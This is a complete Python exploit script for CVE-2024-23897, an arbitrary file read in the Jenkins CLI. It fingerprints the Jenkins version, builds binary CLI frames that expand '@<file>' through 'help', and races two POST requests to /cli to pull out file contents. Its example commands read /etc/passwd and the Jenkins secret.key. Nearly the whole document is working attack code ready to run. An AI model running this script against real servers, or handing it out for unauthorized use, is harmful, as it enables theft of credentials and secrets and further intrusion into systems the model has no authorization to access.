CVE-2024-23897.py
#!/usr/bin/env python3
import re
import sys
import time
import uuid
import urllib3
import requests
import argparse
import threading
from packaging.version import Version
from dataclasses import dataclass

# Disables a pyright warning, because it's annoying
# pyright: reportOptionalMemberAccess=false

# Disables the InsecureRequestWarning, because verify=False is used to allow intercepting proxies
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Global variable for the parsed args
args = None


def log_success(msg: str):
    """
    Logs a success message to stdout

    Arguments:
        msg(str): The message to log
    """
    print(f"[+] {msg}")


def log_failure(msg: str):
    """
    Logs a failure message to stdout

    Arguments:
        msg(str): The message to log
    """
    print(f"[-] {msg}")


def log_info(msg: str):
    """
    Logs an info message to stdout

    Arguments:
        msg(str): The message to log
    """
    print(f"[*] {msg}")


def log_result(msg: str):
    """
    Logs a result message to stdout

    Arguments:
        msg(str): The message to log
    """
    print(f"[>] {msg}")
@dataclass
class ParsedArgs:
    url: str
    force: bool
    raw: bool
    proxy: dict[str, str]
    headers: dict
    cookies: dict
    filepath: str
    timeout: int


def parse_args() -> ParsedArgs:
    """
    Parses the command line args
    Required arguments are marked by a star (*)

    Returns:
        ParsedArgs: the parsed args
    """
    parser = argparse.ArgumentParser(description="CVE-2024-23897 exploit script by cc3305")
    parser.add_argument("url", action="store", help="Target url")
    parser.add_argument("-f", "--force", action="store_true", help="Force the exploit (skip the check if the host is vulnerable)")
    parser.add_argument("--raw", action="store_true", help="Gets the raw output returned from the webserver instead of the parsed version. Use this if the output doesn't look right.")
    parser.add_argument("--timeout", type=int, default=20, help="The timeout of the requests in seconds. Defaults to 20s.")
    parser.add_argument("-x", "--proxy", action="store", help="HTTP proxy in the format http://127.0.0.1:8080")
    parser.add_argument("-H", "--headers", action="append", help="Request headers in the format `\"Header-Name: Header-Value\"`. Multiple -H flags are allowed")
    parser.add_argument("-c", "--cookies", action="store", help="Cookie data in the format `\"COOKIE1=VALUE1; COOKIE2=VALUE2\"`")
    parser.add_argument("-FP", "--file-path", action="store", dest="filepath", help="* File to read on the server", required=True)
    result = parser.parse_args()

    # Bring the proxy, cookies and headers into a pythonic format
    result.proxy = {"http": result.proxy, "https": result.proxy}
    headers = {}
    if result.headers is not None:
        for header in result.headers:
            try:
                # Split only on the first colon, so values like "Host: example.com:8080" stay intact
                name, value = header.split(":", 1)
                headers[name] = value.lstrip()
            except ValueError:
                continue
    result.headers = headers
    cookies = {}
    if result.cookies is not None:
        for cookie in result.cookies.split(";"):
            try:
                # Split only on the first "=", so values containing "=" stay intact
                name, value = cookie.split("=", 1)
                cookies[name.strip()] = value
            except ValueError:
                continue
    result.cookies = cookies
    # The program always assumes the url is in the format http://something.com/, not http://something.com
    if not result.url.endswith("/"):
        result.url = f"{result.url}/"
    return ParsedArgs(**vars(result))
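
# Illustrative example (hypothetical values) of how the options above are normalized:
#   -x http://127.0.0.1:8080 -H "X-Forwarded-For: 10.0.0.1" -c "JSESSIONID=abc; other=1"
# becomes
#   proxy   = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
#   headers = {"X-Forwarded-For": "10.0.0.1"}
#   cookies = {"JSESSIONID": "abc", "other": "1"}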


def check_vulnerable() -> bool:
    """
    Check if the target is vulnerable
    If there is no way to determine if the host is vulnerable, just return True

    Returns:
        bool: True if the target is vulnerable, False otherwise
    """
    # To check if the host is vulnerable, just make a request and check the X-Jenkins response header
    resp = requests.get(f"{args.url}", verify=False, proxies=args.proxy, headers=args.headers, cookies=args.cookies, timeout=args.timeout)
    if "X-Jenkins" not in resp.headers:
        log_failure("Could not get the version from the headers of a server response")
        return False
    # We can differentiate between LTS and weekly releases by the version number:
    # LTS follows X.YYY.Z, weekly follows X.YYY
    version = Version(resp.headers["X-Jenkins"])
    if len(version.release) == 3:
        # LTS
        log_info(f"Version {str(version)} (LTS) detected")
        return version <= Version("2.426.2")
    # Not LTS
    log_info(f"Version {str(version)} detected")
    return version <= Version("2.441")
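
# The thresholds above follow the Jenkins security advisory for CVE-2024-23897:
# the fix shipped in Jenkins 2.442 and LTS 2.426.3, so weekly 2.441 / LTS 2.426.2
# and below are treated as vulnerable.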


def upload_req(payload: bytes, uuid: str):
    """
    Make the upload request

    Arguments:
        payload(bytes): The payload to upload
        uuid(str): A uuid acting as a session identifier
    """
    additional_headers = {"Session": uuid, "Side": "upload", "Content-Type": "application/octet-stream"}
    headers = additional_headers | args.headers
    try:
        upload_resp = requests.post(f"{args.url}cli?remoting=false",
                                    data=payload,
                                    verify=False,
                                    proxies=args.proxy,
                                    headers=headers,
                                    cookies=args.cookies,
                                    timeout=args.timeout)
    except requests.exceptions.ReadTimeout:
        log_failure("Upload request timed out. This can happen because some files just don't like to be read, or the file doesn't exist. (Try /etc/passwd to confirm the exploit, or increase the timeout via --timeout)")
        return
    # Upload failed
    if upload_resp.status_code == 500:
        log_failure("Could not upload payload. This exploit requires precise timing and can therefore sometimes just fail. Try re-running it a few (5-10) times.")
        return


# Build a table mapping all non-printable characters (except line breaks) to None
LINE_BREAK_CHARACTERS = set(["\n", "\r"])
NOPRINT_TRANS_TABLE = {
    i: None for i in range(0, sys.maxunicode + 1) if not chr(i).isprintable() and not chr(i) in LINE_BREAK_CHARACTERS
}


def make_printable(s: str) -> str:
    """
    Replace non-printable characters in a string.

    Arguments:
        s(str): The string to filter

    Returns:
        str: The filtered string
    """
    # The translate method on str removes characters
    # that map to None from the string
    return s.translate(NOPRINT_TRANS_TABLE)
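
# For example, NUL bytes returned by the CLI endpoint are stripped while newlines survive:
#   make_printable("ro\x00ot:x:0:0\n") == "root:x:0:0\n"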


def parse_result(text: str) -> str:
    """
    Parses the file content from the server response

    Arguments:
        text(str): The body from the download response

    Returns:
        str: The parsed string
    """
    # Very primitive
    # The output contains non-printable characters like 0x00 which we need to filter out
    filtered_text = make_printable(text)
    matches = re.search(r"Too many arguments: (.*)\n[\S\n\t\v ]*\(default: (.*)\)", filtered_text)
    if matches is None:
        log_info("Could not parse the output")
        return text
    second_line = matches.group(1)
    first_line = matches.group(2)
    return f"{first_line}\n{second_line}"
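
# Illustrative (paraphrased) shape of the raw output the regex above targets, for a file
# read via `help @<file>`: the second file line is echoed in the "Too many arguments"
# error and the first file line shows up as the argument's default, hence the swap above.
#
#   ERROR: Too many arguments: <second line of the file>
#   java -jar jenkins-cli.jar help [COMMAND]
#   ...
#    COMMAND : Name of the command (default: <first line of the file>)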


def download_req(uuid: str):
    """
    Make the download request

    Arguments:
        uuid(str): A uuid acting as a session identifier
    """
    additional_headers = {"Session": uuid, "Side": "download"}
    headers = additional_headers | args.headers
    try:
        download_resp = requests.post(f"{args.url}cli?remoting=false",
                                      verify=False,
                                      proxies=args.proxy,
                                      headers=headers,
                                      cookies=args.cookies,
                                      timeout=args.timeout)
    except requests.exceptions.ReadTimeout:
        log_failure("Download request timed out. This can happen because some files just don't like to be read, or the file doesn't exist. (Try /etc/passwd to confirm the exploit, or increase the timeout via --timeout)")
        return
    # If the body is just \x00, the payload was not uploaded or executed
    if download_resp.text == "\x00":
        log_failure("No output, even though the upload was successful?")
        return
    if args.raw:
        log_result("Result:\n" + download_resp.text)
        return
    parsed_result = parse_result(download_resp.text)
    log_result("Result:\n" + parsed_result)


def run_exploit():
    # The payload is a sequence of length-prefixed Jenkins CLI frames:
    # a 4-byte big-endian frame length, a 1-byte opcode, then the frame data.
    # It runs `help @<filepath>`; args4j expands "@<file>" to the file's contents,
    # which is the actual vulnerability. The trailing frames set the encoding ("GBK"),
    # the locale ("en_US") and start the command.
    file_arg = b"@" + args.filepath.encode()
    # Argument frames carry a 2-byte string length, so the frame length is len(string) + 2
    file_arg_frame = (len(file_arg) + 2).to_bytes(4, "big") + b"\x00" + len(file_arg).to_bytes(2, "big") + file_arg
    data_string = b"\x00\x00\x00\x06\x00\x00\x04help" + file_arg_frame + b"\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03"
    session_uuid = str(uuid.uuid4())
    # This exploit requires precise timing: the upload and the download request must be sent at around the same time.
    # If the upload request fails with a code 500, the exploit failed and we don't need to wait for the download response.
    upload_thread = threading.Thread(target=upload_req, args=(data_string, session_uuid))
    download_thread = threading.Thread(target=download_req, args=(session_uuid, ))
    download_thread.start()
    time.sleep(0.1)
    upload_thread.start()
    download_thread.join()
    upload_thread.join()
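
# Background on the two racing requests above: the /cli endpoint builds a full-duplex
# HTTP channel by correlating two POSTs through the "Session" header; the request with
# "Side: download" becomes the output stream and the one with "Side: upload" carries the
# command input. The download side therefore gets a small head start so it is already
# connected when the uploaded command runs and its output is streamed back.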


def main():
    global args
    args = parse_args()
    if not args.force:
        if not check_vulnerable():
            log_failure("Host does not seem to be vulnerable, use --force to override")
            exit(0)
    run_exploit()


if __name__ == "__main__":
    main()
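
# Example invocations (hypothetical targets and paths):
#   python3 CVE-2024-23897.py http://10.0.0.5:8080/ -FP /etc/passwd
#   python3 CVE-2024-23897.py http://10.0.0.5:8080/ -FP /var/jenkins_home/secret.key --raw -x http://127.0.0.1:8080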